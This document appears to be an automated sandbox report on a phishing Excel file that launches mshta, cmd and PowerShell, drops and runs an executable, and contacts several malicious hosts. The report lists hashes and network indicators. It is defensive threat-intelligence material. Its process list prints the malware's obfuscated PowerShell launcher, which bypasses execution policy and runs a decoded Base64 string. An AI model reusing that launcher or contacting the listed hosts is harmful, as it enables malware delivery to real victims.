Malware Analysis Report

2025-01-18 23:25

Sample ID 240627-bjerssvalf
Target 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls
SHA256 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64
Tags phishing
Score 10/10

Analysis Overview

score
10/10

SHA256

265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64

Threat Level: Known bad

The file 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls was found to be: Known bad.

Malicious Activity Summary

phishing

Process spawned unexpected child process

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Detected phishing page

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies registry class

Enumerates system info in registry

Checks processor information in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-27 01:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-27 01:10

Reported

2024-06-27 01:12

Platform

win7-20240221-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Detected phishing page

phishing

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware

Modifies registry class


Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 1728 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 2428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1932 wrote to memory of 1784 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2428 wrote to memory of 1808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; IEx($(iEx('[SYSTEm.TExt.eNcOding]'+[cHAr]58+[Char]58+'UtF8.gETSTRinG([SyStEm.CoNVErT]'+[cHAr]0X3A+[chaR]58+'FroMBaSE64sTring('+[cHar]0X22+'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'+[cHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; IEx($(iEx('[SYSTEm.TExt.eNcOding]'+[cHAr]58+[Char]58+'UtF8.gETSTRinG([SyStEm.CoNVErT]'+[cHAr]0X3A+[chaR]58+'FroMBaSE64sTring('+[cHar]0X22+'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'+[cHar]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\irmotvw4.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20DA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20D9.tmp"

C:\Users\Admin\AppData\Roaming\igccu.exe

"C:\Users\Admin\AppData\Roaming\igccu.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 lnkz.at udp
US 104.21.18.65:80 lnkz.at tcp
US 104.21.18.65:443 lnkz.at tcp
US 172.245.135.155:80 172.245.135.155 tcp
BG 91.92.120.127:80 91.92.120.127 tcp
US 8.8.8.8:53 lenscommunity.za.com udp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp

Files

memory/2164-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2164-1-0x00000000722FD000-0x0000000072308000-memory.dmp

memory/2588-21-0x00000000022E0000-0x00000000022E2000-memory.dmp

memory/2164-22-0x0000000002DF0000-0x0000000002DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\Ciguy[1].htm

MD5 0104c301c5e02bd6148b8703d19b3a73
SHA1 7436e0b4b1f8c222c38069890b75fa2baf9ca620
SHA256 446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f
SHA512 84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\R5VDZM2I.txt

MD5 e944c16d233c378e20f88aaca4c4b2bc
SHA1 3880b1af920e8f54d47efcf6b20f8de6a9b0eb91
SHA256 651714f707d7b13e9f837c45a13410ab606214d851043dc30be513eabc99895f
SHA512 26df28002061404d6fb8a68185bae217c287bf1cc6988a10da9dc97fab5f831e4317c22aa37ba7c774194b43fd254a130d3be529164d810af0aa5ae264c9246b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 e0a64fff2279f78a54e21a1d5cf55fab
SHA1 37fe5a4c0817b298c2c1e6dccd71bd810e810b2b
SHA256 4ac4f6934cfc40f8f60c76c60bd1062da6830ddbbe0b66cf319ac160b7ce6986
SHA512 de14cf54fa90223a90af62434b8f7b08f83855fa2a46dd3acc0bc1246127d6f76e3a521ceed1830dda0ed17e5569421337df5d4bf93ac4803753ca9985612dfc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6231a7e335ac0c5675b4d9e53cba3a7c
SHA1 ba46a30aa9a6836c6991224de2731ad69074754e
SHA256 6bb4d89d4989f4264cf1c343698837773b50d4b0963c39c97337747090985705
SHA512 78ab9a108eec356b57c7957849d911ca2794ece3d7025dc9012e16a06d03a3f5fa16a05dae0144e8f07e85567db61225d840181e5a8ccc043d25f0ad681927f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 405afdf945da6eea73625fd7773a899c
SHA1 a3b2379e9a89d74ff8b552cc6ba10bf591c5490a
SHA256 cedb29414c8ee507ee13054f51bb491547306c351ae410b790810eb7f67e4295
SHA512 81460aa2d344ab181755fab820fd359c0c8dca83efef034f8d7141964a1ed65654ae34caf727a10f582bc48d6b3a26448f57787fc9faec0a9ff46ece10d72c7d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 344026bfcbbd31de65311697e93de53e
SHA1 5837d8019fa947cda639841a949e101719056919
SHA256 eaa17f89a999eabc3d9cb341b4dc05facbe264d4b72841fb17000bb7e475627a
SHA512 e803a17d58b5c5a42628410b5535898786ee7c4cf51040ac521f5b5efe81d727071d943e4cae5b18624026f0f91553cf7533d82a6678dcaa8f7e8c30aee9861d

C:\Users\Admin\AppData\Local\Temp\Cab197A.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\alz[1].hta

MD5 cf573287d1845d0c33aba5af99121331
SHA1 5338c9ef25f8aaecaaf48db274efdd048987c66c
SHA256 dface533aae3c418c2ff081471b5362fc2bbad4ad7fe99180b0f0be880ddd60d
SHA512 66e513984de433000c25f59cba3c426241ac6deac1079b7e5ece61c59ae80ed5dd5bcd3866059b1074b9ae61f535c24ae181f966484e4d8ea3526ac0509cf48f

\??\c:\Users\Admin\AppData\Local\Temp\irmotvw4.cmdline

MD5 e770c580ebc9a1340731c9b18ba429a1
SHA1 5763d606e1e30a2343926413b935884b1924f4de
SHA256 add5b3412f39506a63bd1fa482cdf7536481597f970d671ea48b4cced94380c2
SHA512 cbb7c06f377a2af9354298b25a556cda8067aa85fd5f8c48e20164c218cb26eac5bbfb8f0cc2a4892260caeb17a886520254a9027aaf9dc45ac07095637f325f

\??\c:\Users\Admin\AppData\Local\Temp\irmotvw4.0.cs

MD5 4baee22b8aa20472316e9ea4bdb51bc6
SHA1 e2ebe036e53eb17cad6e8941e7688884aa571e5a
SHA256 50a004d5479bbbf5c9f8fe7e2eb511e4142910e1efc5ad8c20b2ff91e691a1c3
SHA512 9b1b2c88d1c843af8e6730a5a15975ddb4c8442c16d2645e07c52e67d4cd2728d9fe6bc3dd16c6e4df0f6882ca12ae717a580a4bbe69da62bfc184c97b2691d9

\??\c:\Users\Admin\AppData\Local\Temp\CSC20D9.tmp

MD5 06605119ad7d2a6c8da20e4f57036af9
SHA1 31cb9679b27672d5bba786a327066d07cbc226c0
SHA256 4fc9dcb3cee54a667830f4990ac81a77736cc44e993349c5d548748cd19c3fd5
SHA512 cebf0f8cac4b45dae82733753b093e60e4667ee4c156d2bab6e4e167e77a3a8a025294870752abdbe6cad488e71add02efe5256f9fdd1980c750c021190b327a

C:\Users\Admin\AppData\Local\Temp\RES20DA.tmp

MD5 05bbe8bfe2f2533f0bbd5bb3f4b79124
SHA1 9ed298d34b84200054df25b0260dd03cb962f690
SHA256 ab1c35092bfe116a245992e1e1277aaad164cd7429c87d0fce9e529324344978
SHA512 db85016379fa4c461baf03d1a661a207868480e054b5ad818f5f7ac3e546bd85dea132f08cc3f507b3767ee88a67cb02796d487a1e25b560a79eed3b1d124925

C:\Users\Admin\AppData\Local\Temp\irmotvw4.dll

MD5 bcff9e90424961d1ec5738595bc45d89
SHA1 cf56cace661c6844a320a1ef4cb51127df7acc53
SHA256 88b97275c7d7d51f278bb9da81e20d3e54377b2d94983f25978c3e00fffcbbb1
SHA512 4b12ad5a12012c6364a1ce1f3a6c0a166b58a3d40da836eb409701358f8baf62b07169e19334c03b5d35de8e4274702f80daeb3c0fa7321cd8573e3686be0377

C:\Users\Admin\AppData\Local\Temp\irmotvw4.pdb

MD5 716882f5fbe77872551419c7fe1b433b
SHA1 fd2496cedc63110bef11204b410b0270bf44a425
SHA256 c0891414a1d07578719c433beb261aaf2434e0398b64d8b0e78a8ac5cdef879d
SHA512 662df3134fcd68243ded91738a1ab66fded1961e258f6156b1c0daadcaf2eb5104dd2f875ac868ff3ba3db762c246cdd4c24615d5f9914b5014d2e2ee713e666

\Users\Admin\AppData\Roaming\igccu.exe

MD5 3803a58f9512197b7242462789defc41
SHA1 747d8969e43395649d765d55a3f9fa4fe492bd21
SHA256 f10ea3e1160e4966e71b49dc53997d122b999f57e398ed5578bd20fbf8254bfd
SHA512 5923a7670e36ab65a58b6b767ebed5b5bd4b38442c434c385311af62a2b4a00d3c7293f208dac1ed06430e1d5ce6968c2a6680bef8cae468c3110f40e7ce5df5

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-27 01:10

Reported

2024-06-27 01:12

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3544 wrote to memory of 2828 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 3544 wrote to memory of 2828 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 lnkz.at udp
US 172.67.180.182:80 lnkz.at tcp
US 172.67.180.182:443 lnkz.at tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 182.180.67.172.in-addr.arpa udp
US 172.245.135.155:80 172.245.135.155 tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 155.135.245.172.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 udp

Files
